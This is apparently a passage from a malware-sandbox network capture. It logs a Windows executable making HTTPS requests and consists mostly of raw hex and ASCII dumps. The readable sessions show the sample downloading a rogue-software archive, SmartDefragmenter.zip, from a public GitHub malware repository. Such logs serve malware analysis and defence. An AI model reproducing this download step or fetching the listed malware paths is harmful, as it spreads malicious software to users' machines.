                                                                                                                                                2022-09-29 12:51:58 UTC36679INData Raw: b9 24 b5 3e 0e fd 04 6c 2f 29 e4 fa b7 f2 ea 57 32 8b 5d 80 6f e8 1c 86 bc cc 8c 34 7c ce db c5 b0 21 94 30 44 e5 5a 94 4c 8b f8 35 fe 6b 8c 8c 38 cd aa db c9 bc 74 7a 72 a8 94 7c 82 fb 65 b8 05 07 a0 f6 e1 8b da ba 8f c6 da e6 ae 51 3e 4f d3 ca 3e 3a d4 6c 32 c2 b4 69 8c f0 10 3b d5 05 3f d0 dd fd 5f 44 69 c3 98 01 66 2a 81 1f c5 01 d3 5b 25 9d 67 68 d2 47 a9 0f 5b b7 c4 b3 6a c8 1a de d5 de a8 5a 13 f2 87 ee 71 9c c9 63 31 e2 e4 a3 46 ee e5 e6 2b 98 6c 75 31 5d bd f4 18 0d bc c4 af ce 75 a7 29 f5 61 66 84 fb 99 5e af 0e ca 81 df 2b 6c 7c 62 d2 e2 f4 18 65 30 7b 64 bd c7 9b 6d 0a e8 29 d2 34 e5 6d c5 2e 11 53 b6 64 34 8d 77 fc 21 5b 41 cb d6 f2 64 32 9d a7 1f 63 72 6f 8d d6 59 f8 09 da a8 d6 2f c3 91 24 4c 47 54 6b a0 ad c6 ca af a6 e5 1f 91 53 84 23 d6
                                                                                                                                                Data Ascii: $>l/)W2]o4|!0DZL5k8tzr|eQ>O>:l2i;?_Dif*[%ghG[jZqc1F+lu1]u)af^+l|be0{dm)4m.Sd4w![Ad2croY/$LGTkS#
                                                                                                                                                2022-09-29 12:51:58 UTC36695INData Raw: 62 51 f1 24 bc c1 d6 26 f3 ef cb de 2f 89 2a bd 66 24 07 cc 2d 4b c8 19 42 ba 12 e0 97 68 19 3a 6d 6e 9f b9 8d f7 e8 c3 ef 4d 2d 73 29 a7 2c 70 61 8c ce 74 9e b6 84 5b 9a 7c 6d ea 2f 84 f6 95 ad ec 2f 60 c9 9d d1 73 79 7c 68 ec 24 4d 41 40 c2 f1 83 41 67 e5 66 12 35 da 41 85 3e 8c 69 9d 18 d9 12 3f 80 da 4d 3e 7f ee 9b 3c ff 21 a2 19 6b 6f de f3 f9 a3 1c a7 e6 09 6d b0 1b 6f e5 13 8d 31 f8 40 12 55 07 57 8c 58 53 bb 1a 56 94 a0 35 08 0b 48 3b 75 e2 fe 1a 2f 15 22 c0 57 78 bd fb 62 db 8c 33 19 8d 13 50 7f d6 7d 1b 57 57 5d 90 51 50 5c 6d b7 e3 23 c2 f1 b8 da 97 b1 a9 d8 f4 11 c8 02 9f c2 06 09 ba 22 61 01 b3 50 2d b9 b2 69 31 3c 79 c7 d3 2f 2f c9 50 55 14 6a e5 2a e0 1f e1 f6 51 81 14 37 0a ea bd 47 06 13 cc d9 24 63 cc 76 f0 94 6b fc 61 df 35 f7 47 ad 62
                                                                                                                                                Data Ascii: bQ$&/*f$-KBh:mnM-s),pat[|m//`sy|h$MA@Agf5A>i?M><!komo1@UWXSV5H;u/"Wxb3P}WW]QP\m#"aP-i1<y//PUj*Q7G$cvka5Gb
                                                                                                                                                2022-09-29 12:51:58 UTC36711INData Raw: 40 16 12 f6 4a 0f ef e1 33 00 62 e6 28 3d 18 e7 b5 dd b6 97 61 41 e4 da cd b0 a2 ac 37 52 b9 36 5e 00 ce 1a 29 10 f0 31 aa 6e 7a 74 e6 a4 f5 2f 14 68 18 5d 49 a1 29 bf fe cf 42 37 fa e4 90 66 e1 de e5 42 44 c9 79 4a 4b 90 79 50 74 f3 10 8f 89 aa 4e 65 7f 28 d1 20 eb 5f 6a 2d 4e 6a 1a 9b 8e ab df 9e 37 b3 42 1c 1f b8 41 79 09 bb 63 d0 97 8c 17 7f 4e 15 54 16 76 27 54 a5 a2 23 87 c1 6c b0 45 e6 b1 4f 91 4e a4 60 49 3e 00 b1 d8 3f b4 24 8c ab 12 be a6 cc 0f fa 6d 05 1b bc d7 70 82 f0 d1 17 db b6 58 f8 d3 af cc ab 4b 1f 85 57 f1 d2 d2 2c 8a 77 6c 05 54 48 da 71 6c 97 36 6f cd bf 62 bf 7e 16 58 eb 25 bc ed 15 7f 8e 07 63 d6 a9 b7 7e c7 bf f4 e7 00 da df 87 f6 ec a0 a4 3c e8 c9 57 ab 0c 09 31 43 58 4e f9 60 3c a9 26 a4 c6 a8 c4 d0 3e 54 bc 4e 0c 01 e1 c1 30 36
                                                                                                                                                Data Ascii: @J3b(=aA7R6^)1nzt/h]I)B7fBDyJKyPtNe( _j-Nj7BAycNTv'T#lEON`I>?$mpXKW,wlTHql6ob~X%c~<W1CXN`<&>TN06
                                                                                                                                                2022-09-29 12:51:58 UTC36727INData Raw: 57 e5 22 9a d6 6e 46 da d6 e2 bc a8 5b 23 7c b2 94 90 98 ec 91 d4 b2 b3 a1 23 9a dd 85 bd fe ee d4 ca 2f 66 e6 e3 7c 32 82 1b b7 7b 05 ab 52 5f e1 8b ea 18 09 97 a4 9e 77 46 ba f7 eb d4 34 66 08 47 e1 2d 3a b7 4e 90 af e7 3c 1b 57 61 38 f7 e9 07 0e ec ee d3 ca 5b 92 e5 3b 0d 8a ec b3 a7 67 ce 3e 03 8e 02 09 19 bb 92 f2 10 12 fd 43 42 99 a9 90 8c f4 97 03 61 a6 26 54 61 c1 02 d7 81 aa 7f ea b9 eb 19 c1 c4 db 02 5e b7 3b e0 f1 ae eb ab ee 9a 2c 13 c9 48 53 f3 6d 4d 02 52 50 2f bb 42 69 19 f0 c9 47 f9 b4 89 58 13 b0 29 d2 c4 14 5c 70 fe ab 05 84 f7 c1 a5 ad 89 3d a9 14 8c 35 4d c3 38 ef 33 4b 82 f6 bf 43 6d 27 43 05 02 15 0d 06 8c 1b 3a 46 8e 21 dd 07 0c 1b 49 02 2a 19 16 23 b0 7b 4f a0 04 ac 13 3e 1e 07 34 3e 59 45 25 df 44 5a 49 af be 00 10 62 ab d6 7b 56
                                                                                                                                                Data Ascii: W"nF[#|#/f|2{R_wF4fG-:N<Wa8[;g>CBa&Ta^;,HSmMRP/BiGX)\p=5M83KCm'C:F!I*#{O>4>YE%DZIb{V
                                                                                                                                                2022-09-29 12:51:58 UTC36737INData Raw: c2 f5 2e bc 40 12 f5 63 94 e4 7b d4 5b 13 a7 79 99 9c c4 5f 0a 85 a3 21 3a e8 2c 86 90 d5 64 0a 11 b8 d0 64 e2 06 26 70 28 ff 25 b7 a1 fb ec 2f 47 91 60 16 77 6c a1 ea 9c 61 41 dc bc 53 ae 55 60 49 05 bc f2 f6 64 31 2a 21 25 3d 8a 7d 0d ae 40 c4 b9 ee c3 e0 bd e4 55 3f 56 0e d9 0c 23 13 7a d2 64 31 c7 a9 51 b8 8b 45 c7 73 19 02 cf 86 12 81 5e 82 b9 fe f1 9f d9 4b 6f f2 1b 1a 93 bb 5c 8b 16 30 75 c3 32 1c b6 c1 b1 21 70 8e 3d d4 f8 d4 0e 52 3b f5 14 60 1f 93 5e f4 82 f8 a6 6b 17 7d cf 4a 8a 89 c2 b5 6b 07 d6 d3 08 7c 31 68 0e 84 6a 20 3b 7e 1d 31 d9 74 74 a2 b1 03 59 c7 f6 d7 17 cf 5d 3f e8 64 54 d9 5a 24 38 5a 93 73 d0 2e cd 9c b0 d0 80 ef b2 1e da 75 e0 aa de 26 fb d5 19 20 c3 73 5b 5d 62 7c 2f f1 cf 81 68 59 d7 66 12 48 e5 17 1b ef 4e fe 89 b3 dd 1a 19
                                                                                                                                                Data Ascii: .@c{[y_!:,dd&p(%/G`wlaASU`Id1*!%=}@U?V#zd1QEs^Ko\0u2!p=R;`^k}Jk|1hj ;~1ttY]?dTZ$8Zs.u& s[]b|/hYfHN
                                                                                                                                                2022-09-29 12:51:58 UTC36753INData Raw: 5a f7 6f 38 a6 90 08 c4 80 e2 a4 f9 04 9b 74 de 11 bf d7 f8 3e d1 b5 8f 37 dc d2 de 88 93 f7 d8 4e b8 0d 8d 75 10 2d 8f 4d 31 d9 d9 45 7b fd 26 46 ea c3 ff 6b 28 a8 11 52 12 50 12 61 3e 9e 4e 08 cb 58 71 2e a8 20 9c 1b 9b 0b 08 6b 51 08 5b 47 f3 04 c5 a4 50 5c a5 a3 8e 5f c4 8f 3c f5 26 c3 5d 23 fa 93 f4 08 92 dc 97 2b b0 de 5b 15 52 62 0a a5 ca 17 64 45 90 35 03 40 00 00 0d ab 27 0d 3f 66 a7 eb f2 56 f7 53 cb d2 7c 05 11 3b 12 89 96 6d 5e 78 e7 d5 f1 e7 09 0b 89 79 5f d2 8c 9c 92 1f 2e 29 e1 2d 9a 61 f3 c5 55 07 1b 39 b8 d1 2c 04 06 c8 54 f5 a5 0d 9f 06 59 ef cf 2d 7f 42 77 88 3e 12 ca eb d9 73 bb 12 0b 27 4a 35 d6 2b d3 86 c1 f4 17 8f 85 55 19 b7 af 0a 5e 5b 86 68 e1 44 ee 03 ae 50 67 13 e0 1d 29 40 5d 31 6e b4 9b f7 b9 10 16 7e d8 c7 ba 46 1c 07 fc 92
                                                                                                                                                Data Ascii: Zo8t>7Nu-M1E{&Fk(RPa>NXq. kQ[GP\_<&]#+[RbdE5@'?fVS|;m^xy_.)-aU9,TY-Bw>s'J5+U^[hDPg)@]1n~F
                                                                                                                                                2022-09-29 12:51:58 UTC36769INData Raw: dd ff cd 01 8a ab 48 13 73 2f d2 6c 9f 22 8d db be c0 23 5e 7a b3 82 c6 8d ad 8a bf 6d b6 69 dc 26 25 ac de 27 c5 de 15 b3 92 b4 1c 7d 1d 55 74 87 da 0a ca 61 33 c8 54 fe bc 7c bd 0c 59 6c a9 87 9a b3 a2 99 9a 15 48 97 fe cb 12 70 ee 61 13 26 95 fc 7a 8d dc a7 2e 88 b5 67 5a 3c 9f 32 e5 cf 95 39 22 55 31 bc a5 d7 e2 06 d9 88 04 f7 0f 5e 81 0a 2c c7 9c df 2c 50 fb 84 06 a2 ea 91 95 fe 70 0f 34 b4 07 88 2c dc 79 41 0e 13 e7 80 c0 45 79 12 e4 82 7f 1a ae e2 05 db b8 ad fe b8 7d 44 49 26 a7 19 9a 39 f8 03 a8 8d 00 63 c2 e5 2b 39 5f b8 e0 89 37 b3 0b 5d e4 2c b3 93 50 4d 1e b7 bd 0c 3e 2f 21 73 6f e6 ca aa 14 7a 90 3d ff 3f 08 4e ff ca 8a 19 2d 4e 01 20 52 88 21 01 a2 35 eb f2 e1 65 b3 ad 24 df 4b a8 05 2a 63 96 d6 48 39 d4 b9 99 be 88 5a 8b a2 62 72 5e ac 00
                                                                                                                                                Data Ascii: Hs/l"#^zmi&%'}Uta3T|YlHpa&z.gZ<29"U1^,,Pp4,yAEy}DI&9c+9_7],PM>/!soz=?N-N R!5e$K*cH9Zbr^
                                                                                                                                                2022-09-29 12:51:58 UTC36785INData Raw: 3d 31 42 78 dc 36 3b 9b 6c a9 b9 91 87 3a 2c 33 39 c9 e3 69 7b f5 e7 bd 2d ee 85 78 01 da 06 8d 08 75 a1 55 51 2a db e1 ac 8d b4 87 fe 64 0b 1c ac 95 46 5e 5b ab 82 1a de 74 0b 88 39 17 f6 64 ab be ab 23 71 9c ec 23 cb 81 27 18 a9 4f a7 bf ca b5 52 bc ab 8a df 1b 2e 84 d8 4e 7e 7b 1c 67 84 35 b4 d3 fc e7 7c 0f ee a3 b9 0d 1b 62 d3 87 52 48 ec d2 9f 5d bd 62 61 c5 ba fb ee 16 21 21 59 ea 87 72 a1 27 f1 0c 8e 55 be d5 e3 f3 bd 9e 24 e4 75 13 0a 17 e8 69 50 e1 98 45 e1 2d 7f db 56 3f ad 51 cd 37 ec aa 29 cc 6a 52 28 01 e2 d9 63 4b ec 43 9d 69 a4 e8 69 dd 19 0b 6d 35 3a 2d 0f dd 2a 9f e5 89 e5 dd 91 e5 84 66 46 26 08 fa ba 21 c2 9c 0e a0 10 1f a7 1f 4f b8 78 bb 8a 89 28 1a 64 df db f7 86 91 c7 97 ed 3c d6 19 c3 d7 41 f1 5b 26 e9 3d e7 68 86 fb bb 1e e1 14 2d
                                                                                                                                                Data Ascii: =1Bx6;l:,39i{-xuUQ*dF^[t9d#q#'OR.N~{g5|bRH]ba!!Yr'U$uiPE-V?Q7)jR(cKCiim5:-*fF&!Ox(d<A[&=h-
                                                                                                                                                2022-09-29 12:51:58 UTC36801INData Raw: 2b a9 a5 6d 33 35 63 3a 31 6d fe 9f b1 be 4a 92 b2 92 ea aa aa 57 e3 16 7a fc c7 b2 98 72 50 b5 63 e1 94 8e 12 14 fb 49 ee c3 e5 36 90 5c 4b 8b d2 c7 aa c9 8d d4 ba 41 a2 a8 bf f3 ce 76 fb 09 bc 68 81 29 e1 bf e8 63 7c 24 cb eb af 32 4a c5 d5 a8 cd 82 26 bb 3d 19 ea ae ed a6 cb 75 26 76 cf 7c 25 6c ea 5a 4e 5c 94 4c 65 ec ba c2 5f 38 d1 9c e2 d9 35 1e b8 39 23 e9 37 84 dc 1e b0 09 a3 1c e2 14 32 a1 0d a1 0c be e7 f7 98 8b 6f 03 40 f6 44 d9 0a 26 3d 4b 9e 27 65 f9 e5 c3 48 ce a8 51 70 0f a9 40 12 02 44 1d 6a da 63 02 e3 49 6e 1c db ab f5 9f 38 15 eb c0 00 6a 9d c0 b0 73 bd 76 96 be bc 31 65 4b 42 fe af 9a 5e 37 07 7e 36 62 cb 5e 6c 47 8c 80 2c 35 89 b8 e5 9f e7 87 8a 1a 4a bd 8c e7 2b 82 15 d4 f1 c7 cc 34 cc 7d 1d 4e 1a f9 23 ee 09 90 4f 7d f5 85 9f 8e eb
                                                                                                                                                Data Ascii: +m35c:1mJWzrPcI6\KAvh)c|$2J&=u&v|%lZN\Le_859#72o@D&=K'eHQp@DjcIn8jsv1eKB^7~6b^lG,5J+4}N#O}
                                                                                                                                                2022-09-29 12:51:58 UTC36817INData Raw: d0 f9 82 90 bc 7d f2 5a 70 5b 19 90 04 50 96 bd 0f 75 fe 9c ab ca 38 e6 5c 4c bc 71 61 7f 72 ce ee b8 c7 79 40 db f5 e7 81 ab 01 4f 47 73 ca eb 4d 81 fd 19 bf 2a 62 d1 06 b0 6b 37 cd 98 a8 99 57 a6 73 56 f4 cf a7 63 5d cb 95 4c 44 35 c2 82 02 92 85 17 6d 19 8c 05 21 18 37 55 5c 0b 28 2d 66 cb 23 32 10 5a 7c 92 30 1a 8a c4 03 19 c3 54 89 bc 89 e7 19 94 1e 74 df a5 5c 20 d3 33 76 b1 a8 cc 59 8c 27 5f 00 e5 03 27 ae 21 f3 5e b4 1c cd 53 b3 66 2b 20 ab d8 13 5c d2 f7 3a 63 b6 a8 49 9e 72 73 a8 88 95 d6 ac b2 c1 52 80 f8 a5 45 92 54 a1 31 1c 0f da c7 01 ec a7 f8 24 f8 0d 38 93 45 9d 76 54 79 08 02 96 d3 27 74 7e b1 a1 ee 34 53 f2 06 e2 f6 69 06 6c 09 2c 75 71 e8 d7 ee 2b 32 79 74 20 3a c8 28 9e 4c 72 71 21 26 da aa 17 69 ba a9 af 36 9b d1 9c 62 14 18 84 81 2d
                                                                                                                                                Data Ascii: }Zp[Pu8\Lqary@OGsM*bk7WsVc]LD5m!7U\(-f#2Z|0Tt\ 3vY'_'!^Sf+ \:cIrsRET1$8EvTy't~4Sil,uq+2yt :(Lrq!&i6b-


                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                64192.168.2.549765140.82.121.3443C:\Users\user\Desktop\4d44bed6.exe
                                                                                                                                                TimestampkBytes transferredDirectionData
                                                                                                                                                2022-09-29 12:52:02 UTC36827OUTGET /Endermanch/MalwareDatabase/raw/master/rogues/SmartDefragmenter.zip HTTP/1.1
                                                                                                                                                Host: github.com
                                                                                                                                                2022-09-29 12:52:02 UTC36827INHTTP/1.1 302 Found
                                                                                                                                                Server: GitHub.com
                                                                                                                                                Date: Thu, 29 Sep 2022 12:52:02 GMT
                                                                                                                                                Content-Type: text/html; charset=utf-8
                                                                                                                                                Vary: X-PJAX, X-PJAX-Container, Turbo-Visit, Turbo-Frame, Accept-Encoding, Accept, X-Requested-With
                                                                                                                                                Access-Control-Allow-Origin: https://render.githubusercontent.com
                                                                                                                                                Location: https://raw.githubusercontent.com/Endermanch/MalwareDatabase/master/rogues/SmartDefragmenter.zip
                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                Strict-Transport-Security: max-age=31536000; includeSubdomains; preload
                                                                                                                                                X-Frame-Options: deny
                                                                                                                                                X-Content-Type-Options: nosniff
                                                                                                                                                X-XSS-Protection: 0
                                                                                                                                                Referrer-Policy: no-referrer-when-downgrade
                                                                                                                                                Expect-CT: max-age=2592000, report-uri="https://api.github.com/_private/browser/errors"
                                                                                                                                                2022-09-29 12:52:02 UTC36828INData Raw: 43 6f 6e 74 65 6e 74 2d 53 65 63 75 72 69 74 79 2d 50 6f 6c 69 63 79 3a 20 64 65 66 61 75 6c 74 2d 73 72 63 20 27 6e 6f 6e 65 27 3b 20 62 61 73 65 2d 75 72 69 20 27 73 65 6c 66 27 3b 20 62 6c 6f 63 6b 2d 61 6c 6c 2d 6d 69 78 65 64 2d 63 6f 6e 74 65 6e 74 3b 20 63 68 69 6c 64 2d 73 72 63 20 67 69 74 68 75 62 2e 63 6f 6d 2f 61 73 73 65 74 73 2d 63 64 6e 2f 77 6f 72 6b 65 72 2f 20 67 69 73 74 2e 67 69 74 68 75 62 2e 63 6f 6d 2f 61 73 73 65 74 73 2d 63 64 6e 2f 77 6f 72 6b 65 72 2f 3b 20 63 6f 6e 6e 65 63 74 2d 73 72 63 20 27 73 65 6c 66 27 20 75 70 6c 6f 61 64 73 2e 67 69 74 68 75 62 2e 63 6f 6d 20 6f 62 6a 65 63 74 73 2d 6f 72 69 67 69 6e 2e 67 69 74 68 75 62 75 73 65 72 63 6f 6e 74 65 6e 74 2e 63 6f 6d 20 77 77 77 2e 67 69 74 68 75 62 73 74 61 74 75 73 2e
                                                                                                                                                Data Ascii: Content-Security-Policy: default-src 'none'; base-uri 'self'; block-all-mixed-content; child-src github.com/assets-cdn/worker/ gist.github.com/assets-cdn/worker/; connect-src 'self' uploads.github.com objects-origin.githubusercontent.com www.githubstatus.


                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                65192.168.2.549766185.199.108.133443C:\Users\user\Desktop\4d44bed6.exe
                                                                                                                                                TimestampkBytes transferredDirectionData
                                                                                                                                                2022-09-29 12:52:02 UTC36829OUTGET /Endermanch/MalwareDatabase/master/rogues/SmartDefragmenter.zip HTTP/1.1
                                                                                                                                                Host: raw.githubusercontent.com
                                                                                                                                                2022-09-29 12:52:02 UTC36830INHTTP/1.1 200 OK
                                                                                                                                                Connection: close
                                                                                                                                                Content-Length: 385789
                                                                                                                                                Cache-Control: max-age=300
                                                                                                                                                Content-Security-Policy: default-src 'none'; style-src 'unsafe-inline'; sandbox
                                                                                                                                                Content-Type: application/zip
                                                                                                                                                ETag: "f99f536fb7d24d720adda8a8578921ca78e3e35a963dab866adeac56f6cbe881"
                                                                                                                                                Strict-Transport-Security: max-age=31536000
                                                                                                                                                X-Content-Type-Options: nosniff
                                                                                                                                                X-Frame-Options: deny
                                                                                                                                                X-XSS-Protection: 1; mode=block
                                                                                                                                                X-GitHub-Request-Id: 0809:045E:1D056D:1EA8B9:63359368
                                                                                                                                                Accept-Ranges: bytes
                                                                                                                                                Date: Thu, 29 Sep 2022 12:52:02 GMT
                                                                                                                                                Via: 1.1 varnish
                                                                                                                                                X-Served-By: cache-mxp6966-MXP
                                                                                                                                                X-Cache: HIT
                                                                                                                                                X-Cache-Hits: 1
                                                                                                                                                X-Timer: S1664455923.613221,VS0,VE199
                                                                                                                                                Vary: Authorization,Accept-Encoding,Origin
                                                                                                                                                Access-Control-Allow-Origin: *
                                                                                                                                                X-Fastly-Request-ID: 95625ab49325f7ecdb5c09e23e69c81d31e22825
                                                                                                                                                Expires: Thu, 29 Sep 2022 12:57:02 GMT
                                                                                                                                                Source-Age: 0
                                                                                                                                                2022-09-29 12:52:02 UTC36830INData Raw: 50 4b 03 04 33 00 01 00 63 00 29 a0 23 4d 00 00 00 00 21 e2 05 00 00 d8 06 00 20 00 0b 00 45 6e 64 65 72 6d 61 6e 63 68 40 53 6d 61 72 74 44 65 66 72 61 67 6d 65 6e 74 65 72 2e 65 78 65 01 99 07 00 02 00 41 45 03 08 00 b5 e6 bc 9a 40 a6 39 37 40 93 e2 67 5c 37 17 42 ff d7 79 b2 75 5e 52 47 29 e0 c4 bd 15 5c 4d ac d4 78 5e 56 42 bb c3 ec 6c 60 ed 0e 68 b0 df b3 1d 57 0d 50 38 b4 42 ef ad 3a b5 e3 28 4f 16 a5 f4 f2 56 fc 29 36 e3 83 25 bb 9f ed 3a d8 c5 58 9a 2c db ca c7 27 3c f9 7f 89 be ad 72 42 e9 a6 0f f0 d8 83 95 47 51 25 fa 70 7c e0 b8 70 22 4b 0b 84 68 e2 78 17 bd 74 19 d0 51 9a e8 ab d0 22 b3 6e bf 1d a5 55 92 87 b6 53 e2 96 bc 74 b2 83 ec 9d 3f d3 88 36 14 95 cc d3 8e a1 92 5d 5a e2 0d 7a 08 e8 c2 1c 23 61 aa 28 a8 76 5d 41 aa 5f 52 cd 93 2f a0 a8
                                                                                                                                                Data Ascii: PK3c)#M! Endermanch@SmartDefragmenter.exeAE@97@g\7Byu^RG)\Mx^VBl`hWP8B:(OV)6%:X,'<rBGQ%p|p"KhxtQ"nUSt?6]Zz#a(v]A_R/
                                                                                                                                                2022-09-29 12:52:02 UTC36832INData Raw: 98 77 e2 b3 cd 1f 68 37 0f f1 7a 32 1a 12 7c 00 96 ba 56 7e c7 1d e1 da a9 3b 4f d7 4e 25 1f 8b 39 77 18 7a bf fb 96 8e ee 02 e2 a1 6a 69 a2 13 5e 89 eb 9b 57 e8 1e d1 c6 56 d7 2c 69 1d a2 35 95 f8 49 bc df fb 78 43 14 8e 38 7d 28 be fe 5e 45 07 67 60 50 df 26 50 42 e6 4e 98 7f 14 58 bb 8c c0 5a ad 41 4b bc 40 86 19 18 c1 55 f5 cb 74 3a 23 4d 35 81 8a 62 e2 d5 29 09 a6 b0 ee e9 15 c4 a7 06 b9 c5 07 7c 88 21 5b 64 1c 39 72 b6 5a cd 59 05 fb fc 50 5a 4e 1e 03 5d 80 f1 b5 e6 70 f0 bc 53 3d 31 d2 ab 21 e4 14 45 25 36 cf 30 b3 7e 26 e6 53 64 df 54 37 f5 99 13 b9 fa 5c e6 0c 61 b6 e6 dc f5 54 fb a4 52 4e 89 89 a9 39 b0 6d 64 a5 b4 9a c4 5e 16 52 1d f4 7f bc c7 f5 15 c1 af 31 e0 07 a1 1e 78 91 ca 58 c0 0d 8f 2b 50 a5 50 f9 b0 b7 85 f1 87 92 f9 4c 1c f6 b0 9a 09
                                                                                                                                                Data Ascii: wh7z2|V~;ON%9wzji^WV,i5IxC8}(^Eg`P&PBNXZAK@Ut:#M5b)|![d9rZYPZN]pS=1!E%60~&SdT7\aTRN9md^R1xX+PPL
                                                                                                                                                2022-09-29 12:52:02 UTC36833INData Raw: 6e 0e 17 f8 7e b7 9a c1 b4 97 81 7b 2f da ad 0f af 47 a8 5a 7c 95 96 10 43 e2 c1 c3 7d ff 5e 9a 72 e2 cf 27 27 d9 2b c3 b8 ab 18 18 6c b0 ff 59 87 19 e1 94 db b4 ee 34 ca bc 2e ff a4 d2 fd e8 d2 5b 97 ff 78 d8 e9 87 c7 11 46 38 2d 3f 2e 73 d1 13 0d bc c1 3b 4c 14 a5 8d c8 81 f8 40 4c 14 dc f3 80 dc fd 62 5f eb 0b 35 21 27 dd a3 a3 34 33 c6 41 c3 e5 a0 ca f8 32 5e 5b 6e 2f 02 7d 5a d8 4b e5 0d 4e 8b da c0 82 90 93 0d a3 fe e4 6d 7d 35 99 7c 5b 35 16 64 3a 94 9f 88 a8 30 1d fc bc 71 20 88 37 7a f6 f8 a8 fc 00 26 1c 66 85 ef f9 cf 22 50 2d 31 3b 5f 9b bf 26 7c 06 0f 0b b6 fa 17 6c c0 8e 93 fb 82 40 c0 4f 4c 6b 31 ae b2 d3 a7 fe 4f 26 b5 2c 4e 8d e9 45 18 40 bf 0f ff 39 87 d4 7f ca c7 78 75 a3 71 8f 05 93 94 bd 73 56 5f 54 53 c4 00 9d e0 02 cb 59 cd 3f ce 6d
                                                                                                                                                Data Ascii: n~{/GZ|C}^r''+lY4.[xF8-?.s;L@Lb_5!'43A2^[n/}ZKNm}5|[5d:0q 7z&f"P-1;_&|l@OLk1O&,NE@9xuqsV_TSY?m
                                                                                                                                                2022-09-29 12:52:02 UTC36834INData Raw: 87 83 aa 9a d3 01 7d 7d a3 d2 ae 65 76 ba 0a f8 b8 61 5a 25 71 1b c1 6e 80 63 51 61 8d 53 bd eb 1f 2a c2 ff c2 b4 94 c6 aa 29 d2 1b 22 24 22 ce 0a ac 92 2a 5b 42 64 b4 37 3d 56 c0 5b 38 83 7c d1 4d 4b d1 07 fa 79 d6 33 b5 44 76 87 60 9d 44 09 98 b7 8e 62 d9 1d 06 38 90 e6 1c cf 38 36 99 a3 b6 a6 ec 17 4c 6c 57 33 a4 a1 5f 4c 4d 5d 91 f5 d5 a7 89 c5 bc ce ef 0d 73 9f 61 32 95 eb 33 c0 3d c8 0d 7a ea aa 90 e3 5f 17 cf 72 36 30 7c 9e ea c7 89 f7 cb 9d 5f a6 74 a4 93 27 b4 5f e3 64 6d e3 e7 e4 4a 0a 96 22 94 ca 85 04 54 c0 7e 8b 89 1a 80 ee d0 2e 41 8b be ec 1d d8 76 c5 c2 f3 b6 56 ae 95 10 1f 14 83 c1 ab f3 dc ad 05 4a b5 42 4d b1 d4 51 51 4a b1 a3 21 1d 74 d0 e9 0b f9 3a 4a d6 22 dd fa 1c 54 f6 ec c9 9f f6 c5 10 c6 bf 80 8f c7 81 ad f8 b8 e7 36 75 65 0f 08
                                                                                                                                                Data Ascii: }}evaZ%qncQaS*)"$"*[Bd7=V[8|MKy3Dv`Db886LlW3_LM]sa23=z_r60|_t'_dmJ"T~.AvVJBMQQJ!t:J"T6ue
                                                                                                                                                2022-09-29 12:52:02 UTC36836INData Raw: d5 9d ba 07 50 95 2c c0 a0 66 61 30 a5 d5 6b 0b e0 4c b3 f5 e2 c0 69 62 e5 ec d8 f8 19 71 1b 63 a8 6a cf 6c a5 34 9b 90 36 57 8c 9c ee f8 14 5b c9 6b 97 e8 d0 07 c3 a7 4f b8 76 e3 d6 2c 51 04 cd e7 7f 94 97 ad 08 bb 99 39 f6 df 65 6e a4 8e 57 c5 95 d7 b3 0f d2 d5 11 6b 9a 60 90 23 c7 e6 68 59 6d 14 e8 79 4e 1c ca 8f 4e 03 a3 d8 40 23 9e d5 2e 54 5a d0 b2 5b 0c 65 ed 11 2a a7 2b 10 e9 0a 4c 3a 67 c4 62 88 29 1a 38 a1 18 8b 66 2e 73 14 08 0d da 6c a8 36 ed 53 61 b5 0e ff 5f 3f 91 d6 69 f5 31 dd 88 57 94 5e 72 3f a2 c7 32 4f 69 ed e8 8d 72 d8 cb 63 ef af fa 15 1b b3 13 55 d5 f1 49 6e 9a ae 64 ce f1 a9 d4 f1 f0 fd 17 f8 fa 5f f9 15 7d 88 e3 fb 22 74 7e 14 b8 a0 29 20 a2 cf b8 ac ae 0a b0 52 52 00 60 5c 08 55 2f 6e 6e c1 96 3f 3d 1b 3d 05 b2 ec 43 94 6f b0 9f
                                                                                                                                                Data Ascii: P,fa0kLibqcjl46W[kOv,Q9enWk`#hYmyNN@#.TZ[e*+L:gb)8f.sl6Sa_?i1W^r?2OircUInd_}"t~) RR`\U/nn?==Co
                                                                                                                                                2022-09-29 12:52:02 UTC36837INData Raw: 0e dc 3c 12 7d 75 8f 48 7f b1 42 ac fe 88 c8 78 74 d4 58 b5 03 78 35 47 e4 85 b7 c2 b5 fd 48 e5 bb 95 40 3d 08 eb 78 ec 92 3c ab 49 c0 02 5c 8b dc 2a f3 55 2d f6 f8 e2 ba ff 6d 7a ab d3 3d 94 6a d0 d8 9d 8d bc 35 8e 43 ff 0b 9f 8f d7 a2 e3 ee bd ae c3 8f c8 72 96 b4 f5 e7 04 1e c1 45 81 9a b6 1b 86 76 bb a7 c8 bc c8 cd ff a4 2d 33 a8 4b e5 81 e3 34 29 67 80 64 f9 c2 41 b8 a4 80 62 7c 47 e0 ee 37 d8 36 83 4f 5a 81 fb 75 0b b2 6d 65 e9 28 36 ca a3 c9 b3 93 c3 05 d1 f9 0f a3 57 78 53 8e c2 0b 3a 9f 9d 32 be 3d 24 0c da 4d ee f6 5d 0e d3 f4 18 b3 7a 32 19 96 06 b4 6d c4 b4 7e 70 b3 d9 74 98 81 e3 bd 64 e1 2f 59 cc e2 a0 12 3b ab 56 89 dd 0d 8c 10 33 00 4e ea 05 f6 f6 b7 f9 ba ea 71 fc 08 3d 2e 32 1d 84 46 50 2c b5 60 55 c0 00 fb 25 60 38 3f e8 8e 1b 5f c1 e8
                                                                                                                                                Data Ascii: <}uHBxtXx5GH@=x<I\*U-mz=j5CrEv-3K4)gdAb|G76OZume(6WxS:2=$M]z2m~ptd/Y;V3Nq=.2FP,`U%`8?_
